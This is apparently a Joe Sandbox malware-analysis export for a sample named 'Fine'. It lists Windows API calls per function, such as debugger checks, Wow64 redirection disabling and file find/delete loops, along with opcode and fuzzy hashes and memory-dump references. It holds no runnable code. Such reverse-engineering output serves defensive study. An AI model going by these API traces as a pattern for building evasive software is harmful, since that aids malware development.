                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D61A9: Shell_NotifyIconW.SHELL32(00000001,?), ref: 001D6299
                                                                                                                                                                                                                                                                                                                            • KillTimer.USER32(?,00000001,?,?), ref: 001EFD36
                                                                                                                                                                                                                                                                                                                            • SetTimer.USER32(?,00000001,000002EE,00000000), ref: 001EFD45
                                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 0022FE33
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_Timer$Kill
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3500052701-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 871625eb415a22e59f41f41980d20468e541ab85ca9c6676e84fc7f1025caf4d
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 446a0652e3c9d7f6f09a80e3dca622a72e1d553d65db0ece3d3eb6dd0f2a6334
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 871625eb415a22e59f41f41980d20468e541ab85ca9c6676e84fc7f1025caf4d
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: F731E571910354BFEB72CF64D845BEBBBFCAB02308F0044AED69997242C7B41A85CB51
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • SetFilePointerEx.KERNEL32(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,002097BA,FF8BC369,00000000,00000002,00000000), ref: 00209744
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32(?,002097BA,FF8BC369,00000000,00000002,00000000,?,00205ED4,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,001F6F41), ref: 0020974E
                                                                                                                                                                                                                                                                                                                            • __dosmaperr.LIBCMT ref: 00209755
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ErrorFileLastPointer__dosmaperr
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2336955059-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 6baa211a531ad33614d016bc8b7c681a20c2e6dfe8efc477d59c0ecae9554b59
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 65afd9207785df33c5258b7a15ccc535dfdd67dc201616e392072e461ab8c0c6
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 6baa211a531ad33614d016bc8b7c681a20c2e6dfe8efc477d59c0ecae9554b59
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: C6012D73630219ABCB159F99EC4586E7719DB85330B244249F811D71E2EBB09D619B90
APIs
Memory Dump Source
• Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
Similarity
• API ID: CloseErrorHandleMode
• String ID:
• API String ID: 3953868439-0
APIs
• Shell_NotifyIconW.SHELL32(00000000,?), ref: 001D3A3C
Similarity
• API ID: IconNotifyShell_
• String ID:
• API String ID: 1144537725-0
APIs
• IsThemeActive.UXTHEME ref: 001D333D
  • Part of subcall function 001D32E6: SystemParametersInfoW.USER32(00002000,00000000,?,00000000), ref: 001D32FB
  • Part of subcall function 001D32E6: SystemParametersInfoW.USER32(00002001,00000000,00000000,00000002), ref: 001D3312
  • Part of subcall function 001D338B: GetCurrentDirectoryW.KERNEL32(00007FFF,?,?,?,?,?,001D3368,?), ref: 001D33BB
  • Part of subcall function 001D338B: IsDebuggerPresent.KERNEL32(?,?,?,?,?,?,001D3368,?), ref: 001D33CE
  • Part of subcall function 001D338B: GetFullPathNameW.KERNEL32(00007FFF,?,?,002A2418,002A2400,?,?,?,?,?,?,001D3368,?), ref: 001D343A
  • Part of subcall function 001D338B: SetCurrentDirectoryW.KERNEL32(?,00000001,002A2418,?,?,?,?,?,?,?,001D3368,?), ref: 001D34BB
• SystemParametersInfoW.USER32(00002001,00000000,00000002,?), ref: 001D3377
Similarity
• API ID: InfoParametersSystem$CurrentDirectory$ActiveDebuggerFullNamePathPresentTheme
• String ID:
• API String ID: 1550534281-0
APIs
• __Init_thread_footer.LIBCMT ref: 001DCEEE
Similarity
• API ID: Init_thread_footer
• String ID:
• API String ID: 1385522511-0
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LoadString
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2948472770-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 17cc1d77bcdaa9626f3b1d5cca3f57c492dfb2a62b345444b2dd1b113952b65e
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 0f9709cf7d3ba4b619fd4d2b783817f634ca487910c8b838082983e35e9d7e98
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 17cc1d77bcdaa9626f3b1d5cca3f57c492dfb2a62b345444b2dd1b113952b65e
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: D3D19A34E1420AEFCB14EF98D8819ADBBB5FF58310F14405AE815AB391DB30AE95CF94
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 665846f462ee8c94ef18b27a7933285bcd2ff338f18532229e44495cf49a58d0
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 912bbe9da5ec9eba1788d7ec31002162eb2d480a058d52def26c1420da44c827
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 665846f462ee8c94ef18b27a7933285bcd2ff338f18532229e44495cf49a58d0
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8D51F875A0020CAFDB10DF68C844BB97BA2EF85364F19816CE9099B391D7B1ED43CB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CharLowerBuffW.USER32(?,?), ref: 0023FCCE
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: BuffCharLower
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2358735015-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d8f5b373bc4a90e005c82f35f88093eec3b8c64711af74169538723531ea3d70
                                                                                                                                                                                                                                                                                                                            • Instruction ID: dc000ea450c9cc8e5514c36a94ac07e2e8db063f119deaf79a4006cb3c740336
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d8f5b373bc4a90e005c82f35f88093eec3b8c64711af74169538723531ea3d70
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 8741C3B290030AAFCB11DFA8D9849AEB7B8EF58314F21453FE512D7251EB70DA55CB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D663E: LoadLibraryA.KERNEL32(kernel32.dll,?,?,001D668B,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D664A
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D663E: GetProcAddress.KERNEL32(00000000,Wow64DisableWow64FsRedirection), ref: 001D665C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D663E: FreeLibrary.KERNEL32(00000000,?,?,001D668B,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D666E
                                                                                                                                                                                                                                                                                                                            • LoadLibraryExW.KERNEL32(?,00000000,00000002,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D66AB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D6607: LoadLibraryA.KERNEL32(kernel32.dll,?,?,00215657,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D6610
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D6607: GetProcAddress.KERNEL32(00000000,Wow64RevertWow64FsRedirection), ref: 001D6622
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D6607: FreeLibrary.KERNEL32(00000000,?,?,00215657,?,?,001D62FA,?,00000001,?,?,00000000), ref: 001D6635
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            • Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: Library$Load$AddressFreeProc
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2632591731-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: d812d703b9c7ea48f9cbea9ea0fce0d741ae15bcfd26be1c0ecb9e32bbbf8163
                                                                                                                                                                                                                                                                                                                            • Instruction ID: d08851e1784514c616bfb00f4e2553b0d75672ec5c18a58117342950aa5882cb
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: d812d703b9c7ea48f9cbea9ea0fce0d741ae15bcfd26be1c0ecb9e32bbbf8163
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: 5311E771600309AACF14AF20CC02BAD77E59F60710F10842FF542A62C2DFB1DA55DB50
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: __wsopen_s
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3347428461-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00204FF0: RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0020319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00205031
                                                                                                                                                                                                                                                                                                                            • _free.LIBCMT ref: 002053DF
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap_free
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 614378929-0
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID:
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID:
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetEnvironmentVariableW.KERNEL32(?,?,00007FFF,00000000), ref: 0024F987
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: EnvironmentVariable
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1431749950-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000008,00000001,00000000,?,0020319C,00000001,00000364,?,?,?,0000000A,00000000), ref: 00205031
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • RtlAllocateHeap.NTDLL(00000000,?,?,?,001F6A79,?,0000015D,?,?,?,?,001F85B0,000000FF,00000000,?,?), ref: 00203BC5
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AllocateHeap
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1279760036-0
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: ClearVariant
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1473721057-0
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: __fread_nolock
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2638373210-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • Shell_NotifyIconW.SHELL32(00000002,?), ref: 001D3963
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: IconNotifyShell_
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 1144537725-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetLongPathNameW.KERNEL32(?,?,00007FFF), ref: 001D3A76
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 001D8577: _wcslen.LIBCMT ref: 001D858A
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: LongNamePath_wcslen
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 541455249-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,00000000,?,00210A84,?,?,00000000,?,00210A84,00000000,0000000C), ref: 00210737
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: CreateFile
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 823142352-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                            • GetFileAttributesW.KERNEL32(?,0023D840), ref: 0023EAB1
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 3188754299-0
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DC54: FindFirstFileW.KERNEL32(?,?), ref: 0023DCCB
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DC54: DeleteFileW.KERNEL32(?,?,?,?), ref: 0023DD1B
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DC54: FindNextFileW.KERNELBASE(00000000,00000010), ref: 0023DD2C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 0023DC54: FindClose.KERNEL32(00000000), ref: 0023DD43
                                                                                                                                                                                                                                                                                                                            • GetLastError.KERNEL32 ref: 0024666E
                                                                                                                                                                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                                                                                                                                                                            • Source File: 0000000B.00000002.2933923140.00000000001D1000.00000020.00000001.01000000.00000009.sdmp, Offset: 001D0000, based on PE: true
• Associated: 0000000B.00000002.2933894089.00000000001D0000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.000000000026D000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934014893.0000000000293000.00000002.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934116910.000000000029D000.00000004.00000001.01000000.00000009.sdmp
• Associated: 0000000B.00000002.2934149011.00000000002A5000.00000002.00000001.01000000.00000009.sdmp
                                                                                                                                                                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                                            • Snapshot File: hcaresult_11_2_1d0000_Fine.jbxd
                                                                                                                                                                                                                                                                                                                            Similarity
                                                                                                                                                                                                                                                                                                                            • API ID: FileFind$CloseDeleteErrorFirstLastNext
                                                                                                                                                                                                                                                                                                                            • String ID:
                                                                                                                                                                                                                                                                                                                            • API String ID: 2191629493-0
                                                                                                                                                                                                                                                                                                                            • Opcode ID: 81f807c48272d0cba3b13329fb47238fb91ad068d62e3c625d2ab8d62bf03309
                                                                                                                                                                                                                                                                                                                            • Instruction ID: 11672ccecfc004f011431f878c3904f759de75715c8d06cd4c7f13bcbc25d736
                                                                                                                                                                                                                                                                                                                            • Opcode Fuzzy Hash: 81f807c48272d0cba3b13329fb47238fb91ad068d62e3c625d2ab8d62bf03309
                                                                                                                                                                                                                                                                                                                            • Instruction Fuzzy Hash: A9F08C366102048FCB14EF5AD845B6EB7E9AF98320F05844AF9098B352CB74BC11CF91
                                                                                                                                                                                                                                                                                                                            APIs
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00231A60
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetLastError.KERNEL32(?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A6C
                                                                                                                                                                                                                                                                                                                              • Part of subcall function 00231A45: GetProcessHeap.KERNEL32(00000008,?,?,00000000,00000000,?,?,002314E7,?,?,?), ref: 00231A7B
